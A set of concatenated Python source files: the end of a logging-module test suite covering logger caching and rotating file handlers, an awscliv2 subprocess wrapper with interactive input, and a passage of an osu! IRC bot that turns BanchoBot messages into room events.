        name = 'my record'
        level = 13
        fn = lno = msg = args = exc_info = func = sinfo = None
        rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
                                       exc_info, func, sinfo)

        for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
            extra = {key: 'some value'}
            self.assertRaises(KeyError, self.logger.makeRecord, name, level,
                              fn, lno, msg, args, exc_info,
                              extra=extra, sinfo=sinfo)

    def test_make_record_with_extra_no_overwrite(self):
        name = 'my record'
        level = 13
        fn = lno = msg = args = exc_info = func = sinfo = None
        extra = {'valid_key': 'some value'}
        result = self.logger.makeRecord(name, level, fn, lno, msg, args,
                                        exc_info, extra=extra, sinfo=sinfo)
        self.assertIn('valid_key', result.__dict__)

    def test_has_handlers(self):
        self.assertTrue(self.logger.hasHandlers())

        for handler in self.logger.handlers:
            self.logger.removeHandler(handler)
        self.assertFalse(self.logger.hasHandlers())

    def test_has_handlers_no_propagate(self):
        # With propagate off, the parent's handlers are not counted.
        child_logger = logging.getLogger('blah.child')
        child_logger.propagate = False
        self.assertFalse(child_logger.hasHandlers())

    def test_is_enabled_for(self):
        old_disable = self.logger.manager.disable
        self.logger.manager.disable = 23
        self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
        self.assertFalse(self.logger.isEnabledFor(22))

    def test_is_enabled_for_disabled_logger(self):
        old_disabled = self.logger.disabled
        old_disable = self.logger.manager.disable

        self.logger.disabled = True
        self.logger.manager.disable = 21

        self.addCleanup(setattr, self.logger, 'disabled', old_disabled)
        self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)

        self.assertFalse(self.logger.isEnabledFor(22))

    def test_root_logger_aliases(self):
        root = logging.getLogger()
        self.assertIs(root, logging.root)
        self.assertIs(root, logging.getLogger(None))
        self.assertIs(root, logging.getLogger(''))
        self.assertIs(root, logging.getLogger('root'))
        self.assertIs(root, logging.getLogger('foo').root)
        self.assertIs(root, logging.getLogger('foo.bar').root)
        self.assertIs(root, logging.getLogger('foo').parent)

        self.assertIsNot(root, logging.getLogger('\0'))
        self.assertIsNot(root, logging.getLogger('foo.bar').parent)

    def test_invalid_names(self):
        self.assertRaises(TypeError, logging.getLogger, any)
        self.assertRaises(TypeError, logging.getLogger, b'foo')

    def test_pickling(self):
        # Pickling a logger round-trips to the same registry singleton.
        for proto in range(pickle.HIGHEST_PROTOCOL + 1):
            for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
                logger = logging.getLogger(name)
                s = pickle.dumps(logger, proto)
                unpickled = pickle.loads(s)
                self.assertIs(unpickled, logger)

    def test_caching(self):
        # Loggers memoize isEnabledFor() answers in _cache; any level or
        # disable change must invalidate the relevant caches.
        root = self.root_logger
        logger1 = logging.getLogger("abc")
        logger2 = logging.getLogger("abc.def")

        # Set root logger level and ensure cache is empty
        root.setLevel(logging.ERROR)
        self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
        self.assertEqual(logger2._cache, {})

        # Ensure cache is populated and calls are consistent
        self.assertTrue(logger2.isEnabledFor(logging.ERROR))
        self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
        self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
        self.assertEqual(root._cache, {})
        self.assertTrue(logger2.isEnabledFor(logging.ERROR))

        # Ensure root cache gets populated
        self.assertEqual(root._cache, {})
        self.assertTrue(root.isEnabledFor(logging.ERROR))
        self.assertEqual(root._cache, {logging.ERROR: True})

        # Set parent logger level and ensure caches are emptied
        logger1.setLevel(logging.CRITICAL)
        self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
        self.assertEqual(logger2._cache, {})

        # Ensure logger2 uses parent logger's effective level
        self.assertFalse(logger2.isEnabledFor(logging.ERROR))

        # Set level to NOTSET and ensure caches are empty
        logger2.setLevel(logging.NOTSET)
        self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
        self.assertEqual(logger2._cache, {})
        self.assertEqual(logger1._cache, {})
        self.assertEqual(root._cache, {})

        # Verify logger2 follows parent and not root
        self.assertFalse(logger2.isEnabledFor(logging.ERROR))
        self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
        self.assertFalse(logger1.isEnabledFor(logging.ERROR))
        self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
        self.assertTrue(root.isEnabledFor(logging.ERROR))

        # Disable logging in manager and ensure caches are clear
        logging.disable()
        self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
        self.assertEqual(logger2._cache, {})
        self.assertEqual(logger1._cache, {})
        self.assertEqual(root._cache, {})

        # Ensure no loggers are enabled
        self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
        self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
        self.assertFalse(root.isEnabledFor(logging.CRITICAL))
class BaseFileTest(BaseTest):
    """Base class for handler tests that write log files."""

    def setUp(self):
        BaseTest.setUp(self)
        # Reserve a unique on-disk name; the handler under test reopens
        # the file itself, so the descriptor is closed immediately.
        handle, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
        os.close(handle)
        self.rmfiles = []

    def tearDown(self):
        # Remove everything registered via assertLogFile(), then the
        # primary log file if it still exists.
        for path in self.rmfiles:
            os.unlink(path)
        if os.path.exists(self.fn):
            os.unlink(self.fn)
        BaseTest.tearDown(self)

    def assertLogFile(self, filename):
        """Assert a log file is there and register it for deletion."""
        self.assertTrue(os.path.exists(filename),
                        msg="Log file %r does not exist" % filename)
        self.rmfiles.append(filename)

    def next_rec(self):
        # A minimal DEBUG-level record carrying the next sequential message.
        message = self.next_message()
        return logging.LogRecord('n', logging.DEBUG, 'p', 1,
                                 message, None, None, None)
class FileHandlerTest(BaseFileTest):
    """Tests for FileHandler stream lifetime behaviour."""

    def test_delay(self):
        # delay=True must defer opening the stream (and creating the
        # file) until the first record is handled.
        os.unlink(self.fn)
        fh = logging.FileHandler(self.fn, encoding='utf-8', delay=True)
        self.assertIsNone(fh.stream)
        self.assertFalse(os.path.exists(self.fn))
        fh.handle(logging.makeLogRecord({}))
        self.assertIsNotNone(fh.stream)
        self.assertTrue(os.path.exists(self.fn))
        fh.close()

    def test_emit_after_closing_in_write_mode(self):
        # Issue #42378: emitting on a closed handler that was opened in
        # 'w' mode must not truncate the file and write the new record.
        os.unlink(self.fn)
        fh = logging.FileHandler(self.fn, encoding='utf-8', mode='w')
        fh.setFormatter(logging.Formatter('%(message)s'))
        fh.emit(self.next_rec())    # '1'
        fh.close()
        fh.emit(self.next_rec())    # '2'
        # Read back with an explicit encoding (the handler wrote UTF-8);
        # consistent with every other text-file open in this test file.
        with open(self.fn, encoding='utf-8') as fp:
            self.assertEqual(fp.read().strip(), '1')
class RotatingFileHandlerTest(BaseFileTest):
    """Tests for RotatingFileHandler rollover, naming and rotation hooks."""

    def test_should_not_rollover(self):
        # If maxbytes is zero rollover never occurs
        rh = logging.handlers.RotatingFileHandler(
                self.fn, encoding="utf-8", maxBytes=0)
        self.assertFalse(rh.shouldRollover(None))
        rh.close()

        # bpo-45401 - test with special file
        # We set maxBytes to 1 so that rollover would normally happen, except
        # for the check for regular files
        rh = logging.handlers.RotatingFileHandler(
                os.devnull, encoding="utf-8", maxBytes=1)
        self.assertFalse(rh.shouldRollover(self.next_rec()))
        rh.close()

    def test_should_rollover(self):
        # With maxBytes=1 any record exceeds the limit.
        rh = logging.handlers.RotatingFileHandler(self.fn, encoding="utf-8", maxBytes=1)
        self.assertTrue(rh.shouldRollover(self.next_rec()))
        rh.close()

    def test_file_created(self):
        # checks that the file is created and assumes it was created
        # by us
        rh = logging.handlers.RotatingFileHandler(self.fn, encoding="utf-8")
        rh.emit(self.next_rec())
        self.assertLogFile(self.fn)
        rh.close()

    def test_rollover_filenames(self):
        # A custom namer is applied to each backup filename; only
        # backupCount (=2) backups are kept.
        def namer(name):
            return name + ".test"
        rh = logging.handlers.RotatingFileHandler(
            self.fn, encoding="utf-8", backupCount=2, maxBytes=1)
        rh.namer = namer
        rh.emit(self.next_rec())
        self.assertLogFile(self.fn)
        rh.emit(self.next_rec())
        self.assertLogFile(namer(self.fn + ".1"))
        rh.emit(self.next_rec())
        self.assertLogFile(namer(self.fn + ".2"))
        self.assertFalse(os.path.exists(namer(self.fn + ".3")))
        rh.close()

    def test_namer_rotator_inheritance(self):
        # namer/rotator may also be provided by overriding them as
        # methods on a subclass rather than assigning callables.
        class HandlerWithNamerAndRotator(logging.handlers.RotatingFileHandler):
            def namer(self, name):
                return name + ".test"

            def rotator(self, source, dest):
                if os.path.exists(source):
                    os.replace(source, dest + ".rotated")

        rh = HandlerWithNamerAndRotator(
            self.fn, encoding="utf-8", backupCount=2, maxBytes=1)
        self.assertEqual(rh.namer(self.fn), self.fn + ".test")
        rh.emit(self.next_rec())
        self.assertLogFile(self.fn)
        rh.emit(self.next_rec())
        # The rotator renamed the backup, so only the ".rotated" file exists.
        self.assertLogFile(rh.namer(self.fn + ".1") + ".rotated")
        self.assertFalse(os.path.exists(rh.namer(self.fn + ".1")))
        rh.close()

    @support.requires_zlib()
    def test_rotator(self):
        # A rotator that gzip-compresses each rotated file; each emit
        # beyond the first triggers a rollover (maxBytes=1), shifting
        # .1 -> .2 and compressing the just-closed log.
        def namer(name):
            return name + ".gz"

        def rotator(source, dest):
            with open(source, "rb") as sf:
                data = sf.read()
                compressed = zlib.compress(data, 9)
                with open(dest, "wb") as df:
                    df.write(compressed)
            os.remove(source)

        rh = logging.handlers.RotatingFileHandler(
            self.fn, encoding="utf-8", backupCount=2, maxBytes=1)
        rh.rotator = rotator
        rh.namer = namer
        m1 = self.next_rec()
        rh.emit(m1)
        self.assertLogFile(self.fn)
        m2 = self.next_rec()
        rh.emit(m2)
        fn = namer(self.fn + ".1")
        self.assertLogFile(fn)
        newline = os.linesep
        # The most recent backup (.1) holds the first message.
        with open(fn, "rb") as f:
            compressed = f.read()
            data = zlib.decompress(compressed)
            self.assertEqual(data.decode("ascii"), m1.msg + newline)
        rh.emit(self.next_rec())
        fn = namer(self.fn + ".2")
        self.assertLogFile(fn)
        # After another rollover, m1 has shifted to .2 ...
        with open(fn, "rb") as f:
            compressed = f.read()
            data = zlib.decompress(compressed)
            self.assertEqual(data.decode("ascii"), m1.msg + newline)
        rh.emit(self.next_rec())
        fn = namer(self.fn + ".2")
        # ... and one more rollover drops m1 (backupCount=2) so .2 now
        # holds m2; no .3 backup is ever created.
        with open(fn, "rb") as f:
            compressed = f.read()
            data = zlib.decompress(compressed)
            self.assertEqual(data.decode("ascii"), m2.msg + newline)
        self.assertFalse(os.path.exists(namer(self.fn + ".3")))
        rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
    """Tests for TimedRotatingFileHandler rollover computation and cleanup."""

    def test_should_not_rollover(self):
        # See bpo-45401. Should only ever rollover regular files
        fh = logging.handlers.TimedRotatingFileHandler(
                os.devnull, 'S', encoding="utf-8", backupCount=1)
        time.sleep(1.1)    # a little over a second ...
        r = logging.makeLogRecord({'msg': 'testing - device file'})
        self.assertFalse(fh.shouldRollover(r))
        fh.close()

    # other test methods added below
    def test_rollover(self):
        # Emit, wait past the 1-second interval, emit again: a rotated
        # file with a timestamp suffix must appear.
        fh = logging.handlers.TimedRotatingFileHandler(
                self.fn, 'S', encoding="utf-8", backupCount=1)
        fmt = logging.Formatter('%(asctime)s %(message)s')
        fh.setFormatter(fmt)
        r1 = logging.makeLogRecord({'msg': 'testing - initial'})
        fh.emit(r1)
        self.assertLogFile(self.fn)
        time.sleep(1.1)    # a little over a second ...
        r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
        fh.emit(r2)
        fh.close()
        # At this point, we should have a recent rotated file which we
        # can test for the existence of. However, in practice, on some
        # machines which run really slowly, we don't know how far back
        # in time to go to look for the log file. So, we go back a fair
        # bit, and stop as soon as we see a rotated file. In theory this
        # could of course still fail, but the chances are lower.
        found = False
        now = datetime.datetime.now()
        GO_BACK = 5 * 60  # seconds
        for secs in range(GO_BACK):
            prev = now - datetime.timedelta(seconds=secs)
            fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
            found = os.path.exists(fn)
            if found:
                self.rmfiles.append(fn)
                break
        msg = 'No rotated files found, went back %d seconds' % GO_BACK
        if not found:
            # print additional diagnostics
            dn, fn = os.path.split(self.fn)
            files = [f for f in os.listdir(dn) if f.startswith(fn)]
            print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
            print('The only matching files are: %s' % files, file=sys.stderr)
            for f in files:
                print('Contents of %s:' % f)
                path = os.path.join(dn, f)
                # Explicit encoding: the handler wrote UTF-8, and this
                # avoids an EncodingWarning under -X warn_default_encoding.
                with open(path, 'r', encoding='utf-8') as tf:
                    print(tf.read())
        self.assertTrue(found, msg=msg)

    def test_invalid(self):
        # Unknown 'when' specifiers must be rejected at construction time.
        assertRaises = self.assertRaises
        assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
                     self.fn, 'X', encoding="utf-8", delay=True)
        assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
                     self.fn, 'W', encoding="utf-8", delay=True)
        assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
                     self.fn, 'W7', encoding="utf-8", delay=True)

    def test_compute_rollover_daily_attime(self):
        # With when='MIDNIGHT' and atTime=12:00, rollover is at noon of
        # the current day, or noon of the next day once noon has passed.
        currentTime = 0
        atTime = datetime.time(12, 0, 0)
        rh = logging.handlers.TimedRotatingFileHandler(
            self.fn, encoding="utf-8", when='MIDNIGHT', interval=1, backupCount=0,
            utc=True, atTime=atTime)
        try:
            actual = rh.computeRollover(currentTime)
            self.assertEqual(actual, currentTime + 12 * 60 * 60)

            actual = rh.computeRollover(currentTime + 13 * 60 * 60)
            self.assertEqual(actual, currentTime + 36 * 60 * 60)
        finally:
            rh.close()

    #@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
    def test_compute_rollover_weekly_attime(self):
        # For each weekday specifier W0..W6, the next rollover is the
        # upcoming occurrence of that weekday at atTime (12:00 UTC).
        currentTime = int(time.time())
        today = currentTime - currentTime % 86400

        atTime = datetime.time(12, 0, 0)

        wday = time.gmtime(today).tm_wday
        for day in range(7):
            rh = logging.handlers.TimedRotatingFileHandler(
                self.fn, encoding="utf-8", when='W%d' % day, interval=1, backupCount=0,
                utc=True, atTime=atTime)
            try:
                if wday > day:
                    # The rollover day has already passed this week, so we
                    # go over into next week
                    expected = (7 - wday + day)
                else:
                    expected = (day - wday)
                # At this point expected is in days from now, convert to seconds
                expected *= 24 * 60 * 60
                # Add in the rollover time
                expected += 12 * 60 * 60
                # Add in adjustment for today
                expected += today
                actual = rh.computeRollover(today)
                if actual != expected:
                    print('failed in timezone: %d' % time.timezone)
                    print('local vars: %s' % locals())
                self.assertEqual(actual, expected)
                if day == wday:
                    # goes into following week
                    expected += 7 * 24 * 60 * 60
                actual = rh.computeRollover(today + 13 * 60 * 60)
                if actual != expected:
                    print('failed in timezone: %d' % time.timezone)
                    print('local vars: %s' % locals())
                self.assertEqual(actual, expected)
            finally:
                rh.close()

    def test_compute_files_to_delete(self):
        # See bpo-46063 for background
        wd = tempfile.mkdtemp(prefix='test_logging_')
        self.addCleanup(shutil.rmtree, wd)
        times = []
        dt = datetime.datetime.now()
        for i in range(10):
            times.append(dt.strftime('%Y-%m-%d_%H-%M-%S'))
            dt += datetime.timedelta(seconds=5)
        prefixes = ('a.b', 'a.b.c', 'd.e', 'd.e.f')
        files = []
        rotators = []
        for prefix in prefixes:
            p = os.path.join(wd, '%s.log' % prefix)
            # encoding added for consistency with the other handler
            # constructions in this file (delay=True, so no stream is
            # actually opened here).
            rotator = logging.handlers.TimedRotatingFileHandler(p, when='s',
                                                                interval=5,
                                                                backupCount=7,
                                                                encoding="utf-8",
                                                                delay=True)
            rotators.append(rotator)
            if prefix.startswith('a.b'):
                for t in times:
                    files.append('%s.log.%s' % (prefix, t))
            else:
                # Move the timestamp before the ".log" extension.
                rotator.namer = lambda name: name.replace('.log', '') + '.log'
                for t in times:
                    files.append('%s.%s.log' % (prefix, t))
        # Create empty files
        for fn in files:
            p = os.path.join(wd, fn)
            with open(p, 'wb') as f:
                pass
        # Now the checks that only the correct files are offered up for deletion.
        # 10 backups exist and backupCount is 7, so exactly 3 candidates each.
        for i, prefix in enumerate(prefixes):
            rotator = rotators[i]
            candidates = rotator.getFilesToDelete()
            self.assertEqual(len(candidates), 3)
            if prefix.startswith('a.b'):
                p = '%s.log.' % prefix
                for c in candidates:
                    d, fn = os.path.split(c)
                    self.assertTrue(fn.startswith(p))
            else:
                for c in candidates:
                    d, fn = os.path.split(c)
                    self.assertTrue(fn.endswith('.log'))
                    self.assertTrue(fn.startswith(prefix + '.') and
                                    fn[len(prefix) + 2].isdigit())
def secs(**kw):
    # Whole seconds represented by the given timedelta keyword arguments.
    return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
# Dynamically generate one test_compute_rollover_<when> method per interval
# type and attach it to TimedRotatingFileHandlerTest (setattr below).
# `exp` is the expected offset in seconds from the epoch to the first
# rollover when the current time is exactly the epoch start (UTC).
for when, exp in (('S', 1),
                  ('M', 60),
                  ('H', 60 * 60),
                  ('D', 60 * 60 * 24),
                  ('MIDNIGHT', 60 * 60 * 24),
                  # current time (epoch start) is a Thursday, W0 means Monday
                  ('W0', secs(days=4, hours=24)),
                  ):
    # `when`/`exp` are bound as defaults to avoid the late-binding-closure
    # pitfall of loop variables.
    def test_compute_rollover(self, when=when, exp=exp):
        rh = logging.handlers.TimedRotatingFileHandler(
            self.fn, encoding="utf-8", when=when, interval=1, backupCount=0, utc=True)
        currentTime = 0.0
        actual = rh.computeRollover(currentTime)
        if exp != actual:
            # Failures occur on some systems for MIDNIGHT and W0.
            # Print detailed calculation for MIDNIGHT so we can try to see
            # what's going on
            if when == 'MIDNIGHT':
                try:
                    if rh.utc:
                        t = time.gmtime(currentTime)
                    else:
                        t = time.localtime(currentTime)
                    currentHour = t[3]
                    currentMinute = t[4]
                    currentSecond = t[5]
                    # r is the number of seconds left between now and midnight
                    r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
                                                       currentMinute) * 60 +
                                                      currentSecond)
                    result = currentTime + r
                    print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
                    print('currentHour: %s' % currentHour, file=sys.stderr)
                    print('currentMinute: %s' % currentMinute, file=sys.stderr)
                    print('currentSecond: %s' % currentSecond, file=sys.stderr)
                    print('r: %s' % r, file=sys.stderr)
                    print('result: %s' % result, file=sys.stderr)
                except Exception as e:
                    print('exception in diagnostic code: %s' % e, file=sys.stderr)
        self.assertEqual(exp, actual)
        rh.close()
    setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
    """Windows-only: NTEventLogHandler must write records to the event log."""
    def test_basic(self):
        logtype = 'Application'
        elh = win32evtlog.OpenEventLog(None, logtype)
        # Record count before logging, so growth can be asserted afterwards.
        num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
        try:
            h = logging.handlers.NTEventLogHandler('test_logging')
        except pywintypes.error as e:
            if e.winerror == 5:  # access denied
                raise unittest.SkipTest('Insufficient privileges to run test')
            raise
        r = logging.makeLogRecord({'msg': 'Test Log Message'})
        h.handle(r)
        h.close()
        # Now see if the event is recorded
        self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
        flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
                win32evtlog.EVENTLOG_SEQUENTIAL_READ
        found = False
        GO_BACK = 100
        events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
        # Scan the most recent records (newest first) for our message.
        for e in events:
            if e.SourceName != 'test_logging':
                continue
            msg = win32evtlogutil.SafeFormatMessage(e, logtype)
            if msg != 'Test Log Message\r\n':
                continue
            found = True
            break
        msg = 'Record not found in event log, went back %d records' % GO_BACK
        self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
    """Miscellaneous module-level checks for the logging package."""

    def test__all__(self):
        """logging.__all__ must cover every public name except known internals."""
        internal_names = {
            'logThreads',
            'logMultiprocessing',
            'logProcesses',
            'currentframe',
            'PercentStyle',
            'StrFormatStyle',
            'StringTemplateStyle',
            'Filterer',
            'PlaceHolder',
            'Manager',
            'RootLogger',
            'root',
            'threading',
        }
        support.check__all__(self, logging, not_exported=internal_names)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
def setUpModule():
    """Enter the default-locale context for the duration of this module's tests."""
    cm = support.run_with_locale('LC_ALL', '')
    cm.__enter__()
    # Restore the previous locale once every test in the module has run.
    unittest.addModuleCleanup(cm.__exit__, None, None, None)
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
interactive_process.py | """
Wrapper for subrocess.Popen with interactive input support.
"""
import select
import subprocess
import sys
import threading
from subprocess import Popen
from typing import Sequence, TextIO
from awscliv2.exceptions import ExecutableNotFoundError, SubprocessError
class InteractiveProcess:
    """
    Wrapper for subprocess.Popen with interactive input support.

    Spawns the command with fully piped stdio and pumps data between the
    child process and the provided text streams using background threads.
    """

    # Poll interval (seconds) used while waiting for user input.
    read_timeout = 0.2
    # NB: evaluated once at class-creation time; pass explicit streams to
    # run() to override per call.
    default_stdout: TextIO = sys.stdout
    default_stdin: TextIO = sys.stdin

    def __init__(self, command: Sequence[str]) -> None:
        self.command = list(command)
        self.finished = True

    def writeall(self, process: Popen, stdout: TextIO) -> None:
        """Copy the child's stdout to `stdout` until the stream closes.

        Reads one byte at a time so interactive prompts (which have no
        trailing newline) appear immediately.
        """
        while True:
            output_data = process.stdout.read(1)
            if not output_data:
                break
            stdout.write(output_data.decode("utf-8"))
            stdout.flush()

    def readall(self, process: Popen, stdin: TextIO) -> None:
        """Forward lines from `stdin` to the child's stdin until EOF.

        Polls with `select` so the loop can also notice `self.finished`
        and exit when the child terminates without any input arriving.
        """
        while True:
            if self.finished:
                break
            rlist = select.select([stdin], [], [], self.read_timeout)[0]
            if not rlist:
                continue
            input_data = stdin.readline()
            if not input_data:
                break
            process.stdin.write(input_data.encode())
            process.stdin.flush()

    def run(self, stdin: TextIO = default_stdin, stdout: TextIO = default_stdout) -> int:
        """Run the command to completion and return its exit code.

        Raises:
            ExecutableNotFoundError: the command binary does not exist.
            SubprocessError: the user interrupted with Ctrl-C.
        """
        self.finished = False
        try:
            process = Popen(
                self.command,
                stdin=subprocess.PIPE,
                stdout=subprocess.PIPE,
                stderr=subprocess.STDOUT,
            )
        except FileNotFoundError as e:
            # Chain the original error so the root cause stays visible.
            raise ExecutableNotFoundError(self.command[0]) from e

        writer = threading.Thread(target=self.writeall, args=(process, stdout))
        reader = threading.Thread(target=self.readall, args=(process, stdin))
        reader.start()
        writer.start()
        try:
            process.wait()
        except KeyboardInterrupt:
            raise SubprocessError("Keyboard interrupt") from None
        finally:
            # Signal the reader loop to stop, then wait for both pumps.
            self.finished = True
            reader.join()
            writer.join()

        return process.returncode
|
bot.py | from .ws import OsuIrc, OsuIrcProxy
from . import models
import typing as t
from threading import Thread
import re
def gettext_between(text: str, before: str, after: str, is_include=False) -> str:  # extract middle text
    """
    Extract the substring of *text* located between *before* and *after*.

    If *before* is absent, extraction starts at the beginning of *text*;
    if *after* is absent (from that point on), it runs to the end.

    :param text: source text
    :param before: leading marker
    :param after: trailing marker
    :param is_include: if True, wrap the result with both markers
    :return: the extracted text
    """
    start = text.find(before)
    start = 0 if start == -1 else start + len(before)
    end = text.find(after, start)
    if end == -1:
        end = len(text)
    middle = text[start:end]
    return before + middle + after if is_include else middle
class OsuBot(OsuIrc):
    """osu! Bancho IRC bot.

    Parses raw IRC lines from Bancho and dispatches them to the handler
    lists registered via :meth:`receiver`; every handler runs in its own
    thread (see :meth:`call_func`).
    """
    def __init__(self, name: str, passwd: str, debug=False, proxy: t.Optional[OsuIrcProxy] = None):
        # Bancho logins are lowercase with underscores instead of spaces.
        super().__init__(name.replace(' ', '_').lower(), passwd, debug=debug, proxy=proxy)
        self.event_channel_message = []  # room/channel message
        self.event_private_message = []  # private message
        self.event_someone_joined_room = []  # joined a room (only fired synchronously when creating a room)
        self.event_someone_change_slot = []  # someone changed slot
        self.event_someone_joined_slot = []  # someone joined a slot (new player entered the room)
        self.event_room_changed_song = []  # room changed song
        self.event_room_changed_host = []  # room changed host
        self.event_someone_left_room = []  # someone left the room
        self.event_match_closed = []  # match/room closed
        self.event_all_players_are_ready = []  # all players are ready
        self.event_user_finished_playing = []  # a player finished the map
        self.event_host_is_changing_map = []  # host started changing the map
        self.event_match_has_started = []  # the match has started
        self.event_match_finished = []  # everyone finished the match
        self.run_after_start = []
        # room name -> room id; filled by strat() when BanchoBot confirms creation.
        self.waiting_room = {}
        self.api = BotApi(self)
    def receiver(self, reg_type: str):
        """Decorator factory: register a handler for the given models.Codes event type."""
        def reg(func: t.Callable):
            def _appender(fs: t.List):
                fs.append(func)
            if reg_type == models.Codes.channel_message:
                _appender(self.event_channel_message)
            if reg_type == models.Codes.private_message:
                _appender(self.event_private_message)
            if reg_type == models.Codes.someone_joined_room:
                _appender(self.event_someone_joined_room)
            if reg_type == models.Codes.run_after_start:
                _appender(self.run_after_start)
            if reg_type == models.Codes.someone_joined_slot:
                _appender(self.event_someone_joined_slot)
            if reg_type == models.Codes.someone_changed_slot:
                _appender(self.event_someone_change_slot)
            if reg_type == models.Codes.changed_song:
                _appender(self.event_room_changed_song)
            if reg_type == models.Codes.changed_host:
                _appender(self.event_room_changed_host)
            if reg_type == models.Codes.someone_left_room:
                _appender(self.event_someone_left_room)
            if reg_type == models.Codes.match_closed:
                _appender(self.event_match_closed)
            if reg_type == models.Codes.all_players_are_ready:
                _appender(self.event_all_players_are_ready)
            if reg_type == models.Codes.user_finished_playing:
                _appender(self.event_user_finished_playing)
            if reg_type == models.Codes.host_is_changing_map:
                _appender(self.event_host_is_changing_map)
            if reg_type == models.Codes.match_has_started:
                _appender(self.event_match_has_started)
            if reg_type == models.Codes.match_finished:
                _appender(self.event_match_finished)
        return reg
    @staticmethod
    def call_func(funcs: t.List, *args, **kwargs):
        """Invoke every handler in `funcs`, each in a freshly started thread."""
        for func in funcs:
            _t = Thread(target=func, args=args, kwargs=kwargs)
            _t.start()
    def strat(self):
        # NOTE(review): method name kept as "strat" (sic, presumably "start")
        # so existing callers keep working.
        """Connect and run the receive loop forever, dispatching parsed events."""
        self.connect()
        self.call_func(self.run_after_start)
        while True:
            for line in self.receive().split('\n'):
                line = line.strip()
                # print(line)
                if line == "ping cho.ppy.sh":
                    self.send("PONG cho.ppy.sh")
                    continue
                if f"!cho@ppy.sh privmsg {self.name} :" in line:  # private message event
                    name = line[1: line.find("!")]
                    msg = line[line.find(f'!cho@ppy.sh privmsg {self.name} :') +
                               len(f"!cho@ppy.sh privmsg {self.name} :"):]
                    if name != "banchobot":
                        self.call_func(self.event_private_message, models.Message(name, msg))
                    else:
                        self.logger(f"Bancho: {msg}", debug=True)
                        if "created the tournament match" in msg:  # a room was created
                            left_msg = msg[len("created the tournament match"):].strip()
                            room_url = re.findall("https://osu\\.ppy\\.sh/mp/\\d*", left_msg)
                            if room_url:
                                room_url = room_url[0]
                                room_id = "#mp_" + room_url[len("https://osu.ppy.sh/mp/"):].strip()
                                room_name = left_msg[len(room_url):].strip()
                                if room_name in self.waiting_room:
                                    # Hand the room id back to BotApi.room_create().
                                    self.waiting_room[room_name] = room_id
                elif "!cho@ppy.sh privmsg" in line:
                    name = line[1: line.find("!")]
                    msg = line[line.find(":", 2) + 1:]
                    channel_id = gettext_between(line, "cho@ppy.sh privmsg ", " :").strip()
                    if name == "banchobot":
                        # BanchoBot room notifications are mapped onto events.
                        self.logger(f"[Bancho] in {channel_id}: {msg}", debug=True)
                        if "beatmap changed to" in msg:
                            _msg = msg[len("beatmap changed to"):].strip()
                            self.call_func(self.event_room_changed_song, models.Message("", _msg, channel_id))
                        elif "joined in slot" in msg:
                            u_name = msg[:msg.find("joined in slot")].strip()
                            slot = msg[msg.find("joined in slot") + len("joined in slot"):].strip()
                            slot = slot[:-1] if slot.endswith(".") else slot
                            self.call_func(self.event_someone_joined_slot, models.Message(u_name, slot, channel_id))
                        elif "moved to slot" in msg:
                            u_name = msg[:msg.find("moved to slot")].strip()
                            slot = msg[msg.find("moved to slot") + len("moved to slot"):].strip()
                            slot = slot[:-1] if slot.endswith(".") else slot
                            self.call_func(self.event_someone_change_slot, models.Message(u_name, slot, channel_id))
                        elif "left the game" in msg:
                            u_name = msg[:msg.find("left the game")].strip()
                            self.call_func(self.event_someone_left_room,
                                           models.Message(u_name, f"{u_name} left {channel_id}", channel_id))
                        elif "became the host" in msg:
                            u_name = msg[:msg.find("became the host")].strip()
                            self.call_func(self.event_room_changed_host, models.Message(u_name, msg, channel_id))
                        elif "finished playing" in msg:
                            uname = msg[:msg.find("finished playing")].strip()
                            _score = gettext_between(msg, "score: ", ", ").strip()
                            _st = f"finished playing (score: {_score}, "
                            pass_str = gettext_between(msg, _st, ").").strip()
                            self.call_func(self.event_user_finished_playing,
                                           models.UserGrade(uname, channel_id, True if pass_str == "passed" else False,
                                                            _score))
                        elif msg == "host is changing map...":
                            self.call_func(self.event_host_is_changing_map, models.Message("", msg, channel_id))
                        elif msg == "the match has started!":
                            self.call_func(self.event_match_has_started, models.Message("", msg, channel_id))
                        elif msg == "the match has finished!":
                            self.call_func(self.event_match_finished, models.Message("", msg, channel_id))
                        elif msg == "closed the match":
                            self.call_func(self.event_match_closed, models.Message("", msg, channel_id))
                        elif "all players are ready" in msg:
                            self.call_func(self.event_all_players_are_ready, models.Message("", msg, channel_id))
                    else:
